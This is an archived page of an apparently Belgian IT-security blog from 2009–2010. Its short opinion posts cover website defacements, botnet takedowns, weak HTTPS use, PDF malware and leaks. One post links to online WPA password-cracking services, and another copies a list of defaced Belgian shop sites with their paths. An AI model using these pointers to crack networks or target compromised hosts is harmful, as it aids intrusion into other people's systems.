05/18/2010

bandits don't have to hack to get your info, they just go to prison and work

Radiant Info Systems has come to a deal with the Indian state of Andhra Pradesh to hire 200 inmates of a state jail to work on data entry, and the processing and transmitting of information.

"The idea is to ensure a good future for the educated convicts after they come out of jail," CN Gopinath Reddy, director general of prisons in Andhra Pradesh, told the BBC.

"With their experience of working in the BPO [business process outsourcing] in jail, any company will absorb them in future."

The outsourcing centre will handle banking information 24 hours a day using a shift system. Inmates will be paid US$2.20 a day, compared to US$0.33 cents a day for other work. source

And this is NO joke.

I would like to know if inmates are handling my banking information - even if I don't do much if any of online banking or transactions.

They say that if you pay peanuts you get monkeys, but here you get bandits.

Permalink | |  Print |  Facebook | | | | Pin it! |

05/17/2010

Deli, MrBricolage and a number of other websites of shops and products hacked

2010/05/15 Und3rGr0unD W4rri0rZ www.lapeyre.be/img/index.html Linux mirror 2010/05/15 Und3rGr0unD W4rri0rZ M game.candia.be/lang/index.html Linux mirror  2010/05/15 Und3rGr0unD W4rri0rZ H M www.club-promo.be Linux mirror

2010/05/15 Und3rGr0unD W4rri0rZ M www.clubextra.be/lang/index.html Linux mirror 2010/05/15 Und3rGr0unD W4rri0rZ M www.coachbelgium.be/popup/inde... Linux mirror

2010/05/15 Und3rGr0unD W4rri0rZ M www.di.be/news/index.html Linux mirror 2010/05/15 Und3rGr0unD W4rri0rZ M www.lapeyre-game.be/images/ind... Linux mirror

2010/05/15 Und3rGr0unD W4rri0rZ M www.mbricolage.be/images/index... Linux mirror

2010/05/15 Und3rGr0unD W4rri0rZ M www.perledelait.be/images/inde... Linux mirror
http://www.zone-h.org/archive/filter=1/domain=be/page=1

What is nice is that you have so many high value accounts on the same linux server

len19

Permalink | |  Print |  Facebook | | | | Pin it! |

04/14/2010

Shredding is not enough.... as Palin supporters found out

Palin is supposed to give a speech in a public university in June. The details of the contract itself were made public because of some 'destruction negligence' by the organizers so that opponents could find and publish the document.

"The students who found the contract document said they acted on a tip that documents were being shredded at the campus administration building on a day when staff members were supposed to be on furlough.

Alicia Lewis, 26, was one of the students who went to investigate. The building was locked and gated, but the students were able to retrieve piles of paperwork, including the contract document, from a nearby trash bin, Lewis said.  source

I prefer confetti machines and for the totally paranoïd I have seen some in which the confetti arrives in a big ball that makes it nearly impossible to find which confetti's to use to make which document. Especially if you add some normal papers with much text.

Permalink | |  Print |  Facebook | | | | Pin it! |

03/23/2010

Scrape 50.000 + emailadresses from Google profiles

what you put online will be found online

also by emailscrapers used by spambots

so why make it so easy for them


1.830 van google.com/profiles  voor @hotmail.com

3.620 van google.com/profiles voor @yahoo.com

76.000 van google.com/profiles voor @gmail.com

567 van google.com/profiles voor @googlemail.com

1 - 100 van circa 4.500 van google.com/profiles  voor @live.com

 

Permalink | |  Print |  Facebook | | | | Pin it! |

03/09/2010

the numbers of insecurity anno 2010 tell it all

The numbers say it all: In 2009, there were 148,000 zombie computers (spammers, botnets, etc.) created per day, over 2.6 million known malicious code threats at the start of 2009, and by the end of the year, nearly 1 million new ones were created. In other words, to quote the illustrious Stewart Baker: "[The security threat] is worse than we even thought."

http://www.circleid.com/posts/icann_and_cybersecurity_hot...

and some other numbers

Congress and other government agencies are under a cyber attack an average of 1.8 billion times a month, a number that has been growing exponentially since President Barack Obama took office.

 

In 2008, security events caused by vectors including worms, Trojan horses and spybots averaged 8 million hits per month. That number skyrocketed to 1.6 billion in 2009 and climbed to 1.8 billion this year, according to Senate Sergeant-at-Arms Terrance Gainer.

 

The Senate Security Operations Center alone receives 13.9 million of those attempts per day.
http://www.politico.com/news/stories/0310/33987.html

Just try to imagine those numbers. Even if only 1% are targeted zero-day very genious attacks, it makes for hundreds of attacks to probe and stop manually.

If you don't have a budget and you have important data you just close down, limit access and block everything you can on a whitelist basis.There is no way any securityproduct will stop all of this all the time everywhere.

Permalink | |  Print |  Facebook | | | | Pin it! |

03/08/2010

what is so disturbing about these hack attacks ?

At one side, they are funny and as such they are treated like the youtube freaks

a quick laugh and quickly forgotten

but there is more to consider

cadeaufabriek.be uses no HTTPS to order cheques

the official organisation that intervenes between the clients and the energy companies uses no https on its forms in which you have to fill in all kinds of personal data

the login process for your CV on the other site has also no HTTPS protection

And there are other sites (also official) in which there is no or very scare or bad use of SSL encryption in their datahandling and -protection. There are no norms in Belgium about that.

And on top of it all, these sites were hacked.

There is no impact report or audit, there is no information for the possible victims if data has been leaked, there is only the wild wild west. Use at your own risk.Because there are no norms in Belgium about that. And as long as nobody files an complaint with the FCCU or the PrivacyCommission there is no problem.

As long as we don't talk about it, right ?

Because people could start having doubts and we would have to invest in security and we can't have that.

and that is all for today, see you tomorrow

Permalink | |  Print |  Facebook | | | | Pin it! |

Microsoft calls for blocking infected PC's by ISP's

Internet Service Providers like Belgacom and Telenet should block PC's that seem to be infected by recognized viruscontrols (not heuristic or advanced onces - that would make for too many false positives).

The only problem with this is that you will need a whitelist of organisations, enterprises and infrastructure that can't be blocked individually but that should go through an alert system. In fact this is the beginning of the building of a networkwide alerting system because every such network would have to set up a process in which calls for cleanup from the ISP are taken care off in a speedy way. This would be useful for the CERT and during crisis. And the reason they would have to do it is because otherwise they couldn't be whitelisted (they will need to adapt a process and fill in forms). The reason they would have to clean up is because they would otherwise loose their whitelisting and be automatically blocked if one of their pc's on their network is infected again. I think the business value of securing your network will be so evident (imagine a day without mail or internet) that no one will doubt for a second to secure the computers and place the necessary limits and controls.

For the ISP's it is also quite interesting because it will take off some of their responsability. They can say : "you are blocked because you are infected and you should clean up your computer before you can reconnect. If you don't know which antivirus, here are links to several free ones you can use for home and/or business use. THis is the virus and see here some links to some help if you can't get it off your systems."  The banks and financial services will also find something interesting in it because they will have less infected clients attacking their networks and trying to steal money from their customers.

If customers get fed up with a continuous stream of infections they don't seem to handle (once hacked, always attacked), isp's can offer a clean pipe or protected zone (get mail, bank and another 100 selected trusted services if that is all you do on the web or what you want your kids or others to do on the web). The trusted zones can also be used when a massive worldwide new attack makes it difficult to use the web worldwide.

This is the quote

"If the access provider just made sure you're not carrying any disease and you're not going to infect the community we'll let you connect with no further ado. But if you are infected with something we recognize and have a signature for, let's clean you up and allow you to connect.

I wondered what is the rational basis for doing this to consumers and I started thinking about smoking. People smoked for the longest time even after we knew it causes many types of cancer, heart disease. Society said you have a right to smoke. Even though you're going to add cost to the health care system that we're all going to have to pay for, if you're going to risk lung cancer that's your right. Then the EPA came out with the secondhand smoke report and suddenly smoking was banned in a lot of public places. The philosophy is simple--you may have the right to risk your own life and risk disease, but you don't have a right to sicken the person next to you. So when we started in Internet security we said to consumers, run antivirus, update your software, and back up your data, and many people didn't. The problem with botnets is you're not just risking yourself any more, you're risking everybody else in the community. It's just like smoking."

http://news.cnet.com/8301-27080_3-10462649-245.html

Permalink | |  Print |  Facebook | | | | Pin it! |

why one should put passwords on files that are important or encrypt them

The PDF format is becoming every day more a vehicle for malware diffusion and hacking. Didier Stevens - a Belgian by the way - has proven another time that you can do whatever you want through manipulated PDF readers (by using the features - not necessarily bugs).

He has made a proof of concept by which he has stolen files from a local computer that was contacted through an infected-hacked PDF file.

Encryption should become the norm or some form of identification before you get access to important files.

It is just a shame that Adobe is killing the PDF format this way, but let no one blame Microsoft afterwards that people will look at its formats again for safe standards because Adobe did this all by itself.

The best thing Adobe can do is give us back a stupid read only no script secure Adobe reader and PDF format. Like in the good old days.

An interesting read

Permalink | |  Print |  Facebook | | | | Pin it! |

03/05/2010

online cracking of your wireless WPA connection

First they discovered wireless and forgotten all about security, who needs that anyway, the internet was made without security so why would the wireless protocol need any security.

After a few incidents and questions the industry as they call themselves got together and decided to write some security protocols to have at least some security, but not too much or too heavy.

This WEP was easily broken, so they had to make another WPA that would be much harder to break (meanwhile people are using no security or WEP) and there is even WPA2 now.

But as with any security it can be broken and what can be broken can be sold and what can be sold can become a criminal business.

So one of the new business models from the cloud is that you can ask a collection of servers and databases to break passwords and encryption. THousands of computers do it for you and you just have to pay for the result. Isn't that fantastic, the power of the cloud for the criminals, a criminal cloud. Imagine what the GRID or Internet2 could bring for organised online crime.

 

Eerst was er geen beveiling toen ze begonnen met wireless. Gewoon vergeten, het moest natuurlijk eerst allemaal zo snel mogelijk gelanceerd worden.

Dan kwamen ze uiteindelijk samen om een aantal veiligheidsnormen op te stellen voor de verschillende soorten draadloze verbindingen (protocollen).

 http://ph33rbot.com/wpa-password-cracker/

http://www.wpacracker.com/

And it even doesn't has to be computers, but due to the enormous computing power for gameboxen are they the favourite tool to set up farms of boxes that will crack passwords and encryption.

What would that mean for an EID attack - to get your national register number, the most unsafe combination of letters even rassembled as an unique identifier.

Permalink | |  Print |  Facebook | | | | Pin it! |

03/03/2010

how to clean up millions of computers at once

We have this week about ten to twenty million of personal computers that were part of botnets and that as zombies have now lost control and contact with their criminal masters and their infrastructure.

There is no way that we can clean them up manually or individually.

But we have captured the infrastructure and the botnet control scripts or domains that are used.

The idea is the following.

All those infected computers should receive a security cleaning and update. It will otherwise change nothing at the threat landscape because those computers will be rehacked and rebotnetted again and again. Probably the other botnets are already trying to reinfect or take over those computers.

So let's use the botnet infrastructure and commands and domains to send a message to those users that they were infected by a botnet and that they should install antivirus software.

Problem is how do you do it while we are telling everyone that they shouldn't click on security alerts that are popping up their screen because they could click on fake security software that is malware in fact.

Maybe the conficker working group can be used. They work through the certs that distribute the IP adresses through their ISP's and at least the network admins will be informed and can clean up these stations or contact the users. For the other individuals maybe one should make an online checkpage or an auto-download directly from their ISP and announce  that they have to install the necessary software (without adding other things so that there is no privacy or other outcry over which is essentially a security cleaning up operation)

It will also prove that the conficker working group is not so much an overhyped exercise but the setting in motion of an international security cooperation and coordination group that can be essential in the tracking, arresting and cleaning up of those international botnets. As long as we have a minimal state in cyberspace, we should have a maximum cooperation between the private partners at least against organised cybercrime and botnets.

I think it is one of the biggest challenges that are before us as the tracking and arresting or dismanteling of botnets becomes easier, the cleaning up operation afterwards will become more challenging and important.

Permalink | |  Print |  Facebook | | | | Pin it! |

another botnet the Mariposa takes the dust

The spainish police has arrested another gang of botnet leaders, the Mariposa. They had more than 800.000 stolen user credentials and controlled 13 million infected computers  (zombies) in 190 countries of which many were part of important confidential networks (perimeter defense ?)

If you want to look if you or your network had any connections you should find them if they have connected to the IP addresses and links that are mentioned in this detailed analysis

http://defintel.com/docs/Mariposa_Analysis.pdf

Make my day, take a botnet away

everyday one :)

Will someone clean this mess up or will those millions of computers stay vulnerable and infected, even if their control and command centers are gone ?



Permalink | |  Print |  Facebook | | | | Pin it! |

08/28/2009

consumers and online banking

The Belgian consumers organisation Test Aankoop says that banks should stay responsable for all problems with online banking and shouldn't expect from users to be security experts and to keep everything uptodate and to punish them if they get defrauded because their computer wasn't updated.

I agree with that. But there is no fundamental human right to have access to any online service if your computer is insecure and could pose a threat to the service you want to use (or to yourself but that would reflect on the company).

So there is a right for banks and other online service to refuse access to computers that don't have an updated antivirus, security updates or a firewall installed. And banks or other services could decided that to make it easier to secure the connection their users should use pre-installed software or special dedicated lines. They should also be able to set whatever norm they want for the login and authorisation (or whatever combination of authentification methods).

If they are to pay for any damage, they have the right to limit the risk as much as they want.

Permalink | |  Print |  Facebook | | | | Pin it! |

08/19/2009

shared hosting disaster : 280 .be domains defaced

bo81

Permalink | |  Print |  Facebook | | | | Pin it! |

Stijn (ex Ubizen) still thinks that the US has no ITsecurity

source (dutch)

It is maybe because he has sold/left the business of ITsecurity (to Verizon) that he has lost touch. He is now manager at a local 'reconversion of the local economy' organisation.

He says that the Europeans are very good at securing their business because they always want to secure it while the Americans are very bad at securing their business because they only want to insure it. Securing their business - in his opinion - is only an option if it costs less than the insurance.

Secondly he still thinks that in the US it is only the market that decides if networks or data get secured and that there are no laws and reglementations over there.

You know, we as Europeans are so smart and confident and intelligent that those things don't happen to us. It is only those stupid Americans that get hacked - is a bit the tone of the non-researched article in a national newspaper around here.

I didn't know if I had to laugh or to cry with these opinions but

* Europe has no IDtheft or breach notification or a bunch of other privacy and ITsecurity laws that the US or a great number of US states already have. It is not perfect but at least it is something and it is better than nothing.

* Europe has no global and private/public partnership and vision about the security of its netwerks and assets. The US has a whole bunch of programs englobing the whole industrial-economic spectrum and government. These programs are all setting up contact networks, processes and guidelines. That those aren't perfect and aren't always used as it should be is normal, but at least they exist.

* There is no Europe just as there is no US. Many of the mentioned American laws are State laws and not federal but the advantage is that you don't have to wait untill the most resistant state finally accepts to secure its networks and assets to begin securing your own. The situation in Europe is much different than presented. The security of the  use of creditcards hasn't the same safety precautions throughout Europe. In some countries you don't need a pincode to use some creditcards.

* And if we are so secure than why do we have a site be-hacked in which online shops pop up from now to than ? It is not because the media doesn't talk about it that the ITinfrastructure in Belgium (and Europe) isn't attacked and hacked. But as there is no obligation to tell and as the press doesn't want to give it much attention and no parliament or governmental institution has the right to ask questions, we still think that we live in a safe fata morgana in the middle of a desert. And as long as we think we live in a fata morgana and we think we have water and green and shadow we don't have to think about the desert.

We are in a desert.

Here in Europe.

In the US they are planting trees and building pipelines and fortresses.

We are still discussing if we have to do something and what.

If you believe the article by Stijn, not much.

Permalink | |  Print |  Facebook | | | | Pin it! |

08/18/2009

destroying your emails but using your own phone (how secure ?)

In the investigation who leaked to the ministers the judicial decision the highest court of Belgium would make in the Fortis case, there is something funny. A detail of course.

It seems that some of the leakers have destroyed the emails on their computers and that there is a problem of material evidence (forensics and ISP ?)

But also in the three investigation into the three illegal leakers of this information (that was already responsable for the fall of our government last year) it is funny to read that in the three investigations all the persons were using their own phones. That easy. Person x phoned to person Y. How do you know ? He used his own phone number.

He didn't go to a public phonebooth in a railstation for example or use the phone of someone else ? They are doing something illegal and they know it and they still use their own phones ? Those are people who are working at the justice department for years and who should know that the telephone logs are one of the easiest things to use.

Permalink | |  Print |  Facebook | | | | Pin it! |

08/17/2009

water leakage in archives and onlooking workers

It was a strange sight on tv. You saw water falling from the room in the archive of the Central Courtoffice in Brussels. You saw some firemen trying to keep the roof from falling by pushing the water through some holes on the paper files beneath it.

Someone was explaining before television that all they would have a look afterwards what the damage was and how the files could be rescued. Meanwhile the water was still falling on those paper files without any plastic protection.

I am not making this up.

They didn't take the files away. Damage control. No security reflex. No reflex to protect what was to be protected. It could be that the firemen were afraid that the whole roof would come down (somewhere above it some waterpipeline was broken). But somebody could have taken 10 minutes to put it in plastic boxes and in safety.

It were the files about the investigation in the possible corruption of one of our most important judges which is making headlines nowadays (and pages and pages of comments and new developments each day).

Permalink | |  Print |  Facebook | | | | Pin it! |

08/14/2009

Obama may be shot - like Kennedy

One of the things that I remembered about the several books I have read about the Kennedy's (still what an inspirational president even if he didn't change as much as he should) is that in the months up to his assassination there was in the south a whole campaign about how dangerous and unpatriotic he was and how he had betrayed his country and so on.

What the conservatives in the US are doing now in their astonishing brutal and radical campaign against the necessary health care reforms is of the same kind. They tell every nut (and be sure there are enough 'New World Order', survivalists, white pride hooligans and other nuts around there) that it would be OK to kill or shoot this president because he is a president, in fact a Nazi, he is not one of them, he is even not an American (the birth certificate nuts) and according to some he may even be ready to declare a state of emergency (and take away your guns). In fact in the US nuts have guns and they use them. They train to use them. And no small guns to protect themselves (as they say) no, real guns you can go to war with.

It should come to no surprise that the intensity of 'assassination' chatter on the internet between those armed nuts is increasing. I think every security professional working for and with the president is going nuts now and working overtime. And each time the president wants to go out to campaign (because he will have to campaign to get this fundamental reform through now - it won't be possible later politically) than all those physical security professionals (bodyguards, secret agents and the rest of them) know that they will need to be at their best for 1000%. Because if this president gets shot than I am not sure if the 'black pride' nuts will behave and if there is as much doubt about the security precautions of the security service as there was about the victory of George Bush in 2000 than you will have more 'conspiracy industry' writers than about 9/11.

But there needs not to be a real conspiracy. There is already a conspiracy by the conservatives to create an atmosphere is which a normal and open democratic debate based on facts is impossible and in which your opponent is described as the biggest threat to anything America stands for since the second world war and Stalin. He will even kill your old mother and father.

And so some nut(s) will say one day that if all these politicians just continue to talk without doing something against such a big threat (and confirmed by those very wise and powerful influential conservatives) "than they will do it".

Nuts are like timebombs. They only start ticking if the environment in which they live becomes explosive. Or if they perceive it as such.

tic tac tic tac tic tac tic tac tic tac

And I already accuse those who create that atmosphere for anything that may happen to any elected official. And the PR masters behind this campaign should remember the film Fantasia in which Mickey takes the hat of the master and has finally so much power that he loses control. I do not think that you really know what you are doing and what the end result may be of this kind of campaign. And do not complain afterwards that you didn't foresee this or that. You started the wildfire, you are responsable for the damages, included the things you didn't want to happen (afterwards). There was Kennedy and Martin Luther King before.

Permalink | |  Print |  Facebook | | | | Pin it! |

08/12/2009

Evonet has 500 hacked .be sites and some still are

len34

They have all the same IP address and they look like homepages made with flash and some other fancy things. They all have a seperate .be domainname but the same IP adress (this is going to be fun if some are spammers and blockers are using the IP adress to filter).

When looking through zone-h.org we saw that there were nearly 500 of these pages that were hacked (linux and apache) and that when the hackers changed the homepage of the site (sic) it was cleaned but the cleaners didn't do their job very well, they didn't check if the hackers did also some other things, like adding a page.

They have added a page with nonsense to a few hundred other webpages. If they don't clean it up it will not be long before the first blocking will appear (and all sites have the same IP address)

Maybe the hackers have left a backdoor or a keylogger or a time-bomb. Who knows ? did you check ?

Have a look at zone-h or http://be-hacked.skynetblogs.be

 

Permalink | |  Print |  Facebook | | | | Pin it! |

it all started with a car that was not parked right

The members of a turkish club had a meeting room next to an internal parking lot hidden from streetview in that city in Belgium. They always met there for thee and talks and passing some time together. It looked as if the days would pass without much happening and every day looked more or less like the day before. The quiet and easy life you would say.

But one day there was a new car in the parking lot. They didn't see that car before so it couldn't be from someone from the neighborhood. There was something not right with that car, it wasn't parked the way all the neighbors parked their cars there. It was strange. So this turk talked to the local cop, the one who is responsable for the community relations and being sure he knows more or less what happens in his bloc.

It was interesting he said. He would check it and he consulted the database of stolen cars. Bingo. It was the car that was used by the prisoners who escaped prison last week. They were only looking for the girlfriend from one of them. THe others were already found.

But where could she be ? The police had another clue. The GSM of the girlfirend was being traced to a GSM tower not far from the parking lot. She was definitively here. But you can't search a few thousand people. Where could she be ? She wouldn't be with a turkish family because she wasn't turk. There were only a few Maroccan families living here. So he visited them. And found them.

A perfect example of good neighborhood relationship with the local police who knows well his neighborhood, a national database and some intelligent modern tracking methods. None of those methods alone would probably have resulted in such a quick arrest but the combination of them makes each of them more efficient. It is the puzzle and not the pieces on which one should concentrate. You are always missing pieces but maybe you have already enough to make a beautiful puzzle anyway.

Permalink | |  Print |  Facebook | | | | Pin it! |

how to turn that wireless bandwith thief upside down

Now and than there is some loser who gets caught and maybe convicted because he is stealing bandwith from his neighbors who have forgotten to secure his installations (or had to return to default because after some upgrades nothing works as it should be)

But here i am reading a really funny piece about some ITgeek who made some changes so that the bandwith was seeing everything on his screen upside down or very fuzzy. I could think of some others thing you could do to his computer (passing through your router) but some of them would be clearly illegal. Some of the security guys here will probably have the same ideas. I don't think they would do it again.

http://www.ex-parrot.com/~pete/upside-down-ternet.html

It all seems a bit too difficult for people who are not that technical. Someone should put it into a click and play tool and call it 'eat that, bandwith thief'

Permalink | |  Print |  Facebook | | | | Pin it! |

1 2 3 4 5 6 7 8 Next